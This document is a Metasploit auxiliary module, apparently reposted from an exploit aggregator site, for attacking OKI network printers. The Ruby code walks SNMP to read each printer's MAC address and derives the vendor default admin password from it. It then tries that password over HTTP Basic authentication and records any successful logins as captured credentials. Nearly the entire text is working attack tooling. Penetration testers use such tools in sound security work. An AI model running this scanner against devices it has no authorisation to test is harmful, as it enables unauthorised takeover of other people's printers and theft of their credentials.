Share
## https://sploitus.com/exploit?id=PACKETSTORM:181212
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# TODO: Split this module into two separate SNMP and HTTP modules.
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'OKI Printer Default Login Credential Scanner',
'Description' => %q{
This module scans for OKI printers via SNMP, then tries to connect to found devices
with vendor default administrator credentials via HTTP authentication. By default, OKI
network printers use the last six digits of the MAC as admin password.
},
'Author' => 'antr6X <anthr6x[at]gmail.com>',
'License' => MSF_LICENSE
))
register_options(
[
OptPort.new('SNMPPORT', [true, 'The SNMP Port', 161]),
OptPort.new('HTTPPORT', [true, 'The HTTP Port', 80])
])
deregister_options('RPORT', 'VHOST')
end
def cleanup
datastore['RPORT'] = @org_rport
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: Time.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def run_host(ip)
@org_rport = datastore['RPORT']
datastore['RPORT'] = datastore['SNMPPORT']
index_page = "index_ad.htm"
auth_req_page = "status_toc_ad.htm"
snmp = connect_snmp()
snmp.walk("1.3.6.1.2.1.2.2.1.6") do |mac|
last_six = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase
first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase
# check if it is a OKI
# OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
if first_six == "002536" || first_six == "008087" || first_six == "002536"
sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
print_status("Found: #{sys_name}")
print_status("Trying credential: admin/#{last_six}")
tcp = Rex::Socket::Tcp.create(
'PeerHost' => rhost,
'PeerPort' => datastore['HTTPPORT'],
'Context' =>
{
'Msf'=>framework,
'MsfExploit'=>self
}
)
auth = Rex::Text.encode_base64("admin:#{last_six}")
http_data = "GET /#{auth_req_page} HTTP/1.1\r\n"
http_data << "Referer: http://#{ip}/#{index_page}\r\n"
http_data << "Authorization: Basic #{auth}\r\n\r\n"
tcp.put(http_data)
data = tcp.recv(12)
response = "#{data[9..11]}"
case response
when "200"
print_good("#{rhost}:#{datastore['HTTPPORT']} logged in as: admin/#{last_six}")
report_cred(
ip: rhost,
port: datastore['HTTPPORT'],
service_name: 'http',
user: 'admin',
password: last_six,
proof: response.inspect
)
when "401"
print_error("Default credentials failed")
when "404"
print_status("Page not found, try credential manually: admin/#{last_six}")
else
print_status("Unexpected message")
end
disconnect()
end
end
# No need to make noise about timeouts
rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")
ensure
disconnect_snmp
end
end